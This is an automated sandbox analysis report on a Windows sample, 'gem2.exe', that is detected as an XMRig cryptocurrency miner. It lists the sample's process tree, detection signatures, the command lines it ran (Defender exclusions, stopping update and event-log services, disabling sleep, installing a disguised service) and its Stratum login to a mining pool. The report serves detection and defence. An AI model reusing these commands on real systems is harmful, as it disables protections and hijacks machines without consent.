Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gem2.exe

Overview

General Information

Sample name:gem2.exe
Analysis ID:1587388
MD5:990a3f3b1273510f210fb9b541da219f
SHA1:33e536c5b4bdb6f6042f93445dffd8a3ad488e8b
SHA256:35a8d03f86ae6f92424d6424fe0805d338eccedff177b400182102685299022c
Tags:exeJalapenomalwaretrojanuser-Joker
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hooks files or directories query functions (used to hide files and directories)
Hooks processes query functions (used to hide processes)
Hooks registry keys query functions (used to hide registry keys)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • gem2.exe (PID: 7280 cmdline: "C:\Users\user\Desktop\gem2.exe" MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 7292 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7564 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7656 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7572 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7672 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7720 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7768 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7808 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7848 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7856 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7864 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7872 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7888 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • winlogon.exe (PID: 564 cmdline: winlogon.exe MD5: F8B41A1B3E569E7E6F990567F21DCE97)
      • lsass.exe (PID: 640 cmdline: C:\Windows\system32\lsass.exe MD5: A1CC00332BBF370654EE3DC8CDC8C95A)
      • svchost.exe (PID: 924 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • dwm.exe (PID: 992 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • sc.exe (PID: 7924 cmdline: C:\Windows\system32\sc.exe delete "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8096 cmdline: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8136 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8144 cmdline: C:\Windows\system32\sc.exe start "GeekBrains" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • Lightshot.exe (PID: 6472 cmdline: C:\ProgramData\Screenshots\Lightshot.exe MD5: 990A3F3B1273510F210FB9B541DA219F)
    • powershell.exe (PID: 7092 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1020 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6488 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 4760 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 2140 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 4140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5628 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7332 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7392 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7296 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7300 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7652 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7572 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dialer.exe (PID: 7660 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
      • svchost.exe (PID: 444 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 732 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1032 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • svchost.exe (PID: 1056 cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dialer.exe (PID: 7724 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
    • dialer.exe (PID: 7720 cmdline: dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
      • 0x37eb98:$a1: mining.set_target
      • 0x370e20:$a2: XMRIG_HOSTNAME
      • 0x373748:$a3: Usage: xmrig [OPTIONS]
      • 0x370df8:$a4: XMRIG_VERSION
      Process Memory Space: dialer.exe PID: 7720JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        Process Memory Space: dialer.exe PID: 7720MacOS_Cryptominer_Xmrig_241780a1unknownunknown
        • 0x359f1:$a1: mining.set_target
        • 0x3219a:$a2: XMRIG_HOSTNAME
        • 0x32f12:$a3: Usage: xmrig [OPTIONS]
        • 0x3217b:$a4: XMRIG_VERSION

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        65.2.dialer.exe.140000000.0.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          65.2.dialer.exe.140000000.0.unpackMacOS_Cryptominer_Xmrig_241780a1unknownunknown
          • 0x37ef98:$a1: mining.set_target
          • 0x371220:$a2: XMRIG_HOSTNAME
          • 0x373b48:$a3: Usage: xmrig [OPTIONS]
          • 0x3711f8:$a4: XMRIG_VERSION
          65.2.dialer.exe.140000000.0.unpackMAL_XMR_Miner_May19_1Detects Monero Crypto Coin MinerFlorian Roth
          • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
          65.2.dialer.exe.140000000.0.unpackMALWARE_Win_CoinMiner02Detects coinmining malwareditekSHen
          • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
          • 0x3cd180:$s3: \\.\WinRing0_
          • 0x376148:$s4: pool_wallet
          • 0x3705f0:$s5: cryptonight
          • 0x370600:$s5: cryptonight
          • 0x370610:$s5: cryptonight
          • 0x370620:$s5: cryptonight
          • 0x370638:$s5: cryptonight
          • 0x370648:$s5: cryptonight
          • 0x370658:$s5: cryptonight
          • 0x370670:$s5: cryptonight
          • 0x370680:$s5: cryptonight
          • 0x370698:$s5: cryptonight
          • 0x3706b0:$s5: cryptonight
          • 0x3706c0:$s5: cryptonight
          • 0x3706d0:$s5: cryptonight
          • 0x3706e0:$s5: cryptonight
          • 0x3706f8:$s5: cryptonight
          • 0x370710:$s5: cryptonight
          • 0x370720:$s5: cryptonight
          • 0x370730:$s5: cryptonight

          Sigma Signatures

          Change of critical system settings

          barindex
          Sigma detected: Disable power options
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7848, ProcessName: powercfg.exe

          System Summary

          barindex
          Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7292, ProcessName: powershell.exe
          Sigma detected: Powershell Defender Exclusion
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7292, ProcessName: powershell.exe
          Sigma detected: Uncommon Svchost Parent Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\system32\dialer.exe, ParentImage: C:\Windows\System32\dialer.exe, ParentProcessId: 7888, ParentProcessName: dialer.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 924, ProcessName: svchost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "GeekBrains" binpath= "C:\ProgramData\Screenshots\Lightshot.exe" start= "auto", ProcessId: 8096, ProcessName: sc.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7292, ProcessName: powershell.exe

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Sigma detected: Stop EventLog
          Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\gem2.exe", ParentImage: C:\Users\user\Desktop\gem2.exe, ParentProcessId: 7280, ParentProcessName: gem2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8136, ProcessName: sc.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T10:16:08.375586+010020479282Crypto Currency Mining Activity Detected192.168.2.5601741.1.1.153UDP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-10T10:15:53.890023+010028269302Crypto Currency Mining Activity Detected192.168.2.549704141.94.96.14480TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\ProgramData\Screenshots\Lightshot.exeReversingLabs: Detection: 65%
          Multi AV Scanner detection for submitted file
          Source: gem2.exeVirustotal: Detection: 62%Perma Link
          Source: gem2.exeReversingLabs: Detection: 65%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

          Bitcoin Miner

          barindex
          Yara detected Xmrig cryptocurrency miner
          Source: Yara matchFile source: dump.pcap, type: PCAP
          Source: Yara matchFile source: 65.2.dialer.exe.140000000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dialer.exe PID: 7720, type: MEMORYSTR
          Detected Stratum mining protocol
          Source: global trafficTCP traffic: 192.168.2.5:49704 -> 141.94.96.144:80 payload: data raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 4d 33 39 44 4d 31 44 51 6a 46 4b 55 6e 54 33 74 32 4b 69 48 4e 55 36 71 51 6a 6d 52 46 37 39 4a 33 31 66 53 62 74 42 4e 61 66 55 58 39 42 32 67 41 77 79 73 6a 4c 46 41 44 51 35 6d 68 71 52 34 4d 36 43 38 4a 4a 52 46 58 77 4c 50 78 44 48 61 70 75 43 72 48 45 33 6d 52 42 6a 54 77 22 2c 22 70 61 73 73 22 3a 22 55 6c 74 69 6d 61 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 64 22 3a 22 22 2c 22 61 6c 67 6f 22 3a 5b 22 72 78 2f 30 22 2c 22 63 6e 2f 32 22 2c 22 63 6e 2f 72 22 2c 22 63 6e 2f 66 61 73 74 22 2c 22 63 6e 2f 68 61 6c 66 22 2c 22 63 6e 2f 78 61 6f 22 2c 22 63 6e 2f 72 74 6f 22 2c 22 63 6e 2f 72 77 7a 22 2c 22 63 6e 2f 7a 6c 73 22 2c 22 63 6e 2f 64 6f 75 62 6c 65 22 2c 22 63 6e 2f 63 63 78 22 2c 22 63 6e 2d 6c 69 74 65 2f 31 22 2c 22 63 6e 2d 68 65 61 76 79 2f 30 22 2c 22 63 6e 2d 68 65 61 76 79 2f 74 75 62 65 22 2c 22 63 6e 2d 68 65 61 76 79 2f 78 68 76 22 2c 22 63 6e 2d 70 69 63 6f 22 2c 22 63 6e 2d 70 69 63 6f 2f 74 6c 6f 22 2c 22 63 6e 2f 75 70 78 32 22 2c 22 63 6e 2f 67 70 75 22 2c 22 63 6e 2f 31 22 2c 22 72 78 2f 77 6f 77 22 2c 22 72 78 2f 61 72 71 22 2c 22 72 78 2f 67 72 61 66 74 22 2c 22 72 78 2f 73 66 78 22 2c 22 72 78 2f 6b 65 76 61 22 2c 22 70 61 6e 74 68 65 72 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 22 2c 22 61 72 67 6f 6e 32 2f 63 68 75 6b 77 61 76 32 22 2c 22 61 72 67 6f 6e 32 2f 6e 69 6e 6a 61 22 2c 22 67 68 6f 73 74 72 69 64 65 72 22 5d 7d 7d 0a data ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"46m39dm1dqjfkunt3t2kihnu6qqjmrf79j31fsbtbnafux9b2gawysjlfadq5mhqr4m6c8jjrfxwlpxdhapucrhe3mrbjtw","pass":"ultima","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
          Found strings related to Crypto-Mining
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exeString found in binary or memory: cryptonight-monerov7
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: -o, --url=URL URL of mining server
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: dialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: gem2.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: Lightshot.exe, 00000025.00000003.2127811419.000002683F580000.00000004.00000001.00020000.00000000.sdmp
          Source: C:\Windows\System32\winlogon.exeCode function: 29_2_000001E85898DCE0 FindFirstFileExW,29_2_000001E85898DCE0
